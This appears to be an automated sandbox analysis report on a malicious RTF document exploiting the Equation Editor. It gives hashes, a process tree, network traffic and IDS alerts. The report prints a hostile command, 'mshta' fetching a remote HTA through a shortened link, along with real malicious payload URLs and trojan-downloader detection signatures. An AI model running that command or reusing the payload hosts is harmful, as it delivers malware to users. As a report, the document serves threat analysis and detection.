File name: | 0001.doc |
Full analysis: | https://app.any.run/tasks/4fa67967-bfc7-4fa3-99d2-f76421e70c9c |
Verdict: | Malicious activity |
Analysis date: | January 18, 2019, 11:24:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 449C028B604D90FBF46EAB4CB9512909 |
SHA1: | F2F422E78044E22A00DA3B8CF6147C415F2CDE4A |
SHA256: | 5B5386FFB99444552C33C70C487CE32CB074C63C91CF75FB9B55F73366523EAA |
SSDEEP: | 6144:yr3MOkNmarrMMMMMMM3BgDZb9WvWKFKYgiDn:9e |
.rtf | | | Rich Text Format (100) |
---|
Author: | - |
---|---|
LastModifiedBy: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0001.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3632 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2316 | mshta http://bit.ly/2HfbUVJ &AAAAAAAAAAAAAAAC | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR99D5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F375F3E0-13D2-47A2-A361-F64115B99807}.tmp | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9B5C50B-96A0-41DB-8BB7-089D393CEB15}.tmp | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2987F258-1AEC-47D8-BA6F-75D070734B9B}.tmp | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$01.doc.rtf | pgc | |
MD5:BD418E904C0EBEE4B56FF916F9ECA9AD | SHA256:D88816E19D1719737EB096D3CA4E62681DF15176B73F5C30476945D0010F5EFB | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6941F220-D31F-4654-95FC-AA701E93A984}.tmp | binary | |
MD5:7F27E40025294C43FACD36CF0D74A181 | SHA256:A490FBC1086304D908DDE0AF833E78C669A1D04B7E1945D1B4F03F8D8E8C11D5 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2316 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:99ECD86F4A30E5742B0DF73AD8421190 | SHA256:EF55317E4CE4C3F38226132B9E91F7B5E4E431EB48AA1D4A1A0C23910416F060 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2316 | mshta.exe | GET | — | 67.199.248.10:80 | http://bit.ly/2HfbUVJ | US | — | — | shared |
2316 | mshta.exe | GET | 302 | 162.241.218.34:80 | http://www.nzfoi.org/wp-content/themes/genesis/lib/order.hta | US | html | 319 b | malicious |
2316 | mshta.exe | GET | 404 | 162.241.218.34:80 | http://box5532.bluehost.com/suspended.page/disabled.cgi/www.nzfoi.org.nz | US | html | 321 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2316 | mshta.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
2316 | mshta.exe | 162.241.218.34:80 | www.nzfoi.org | CyrusOne LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
www.nzfoi.org |
| malicious |
box5532.bluehost.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2316 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader |
2316 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
2316 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
2316 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
2316 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object |
2316 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object |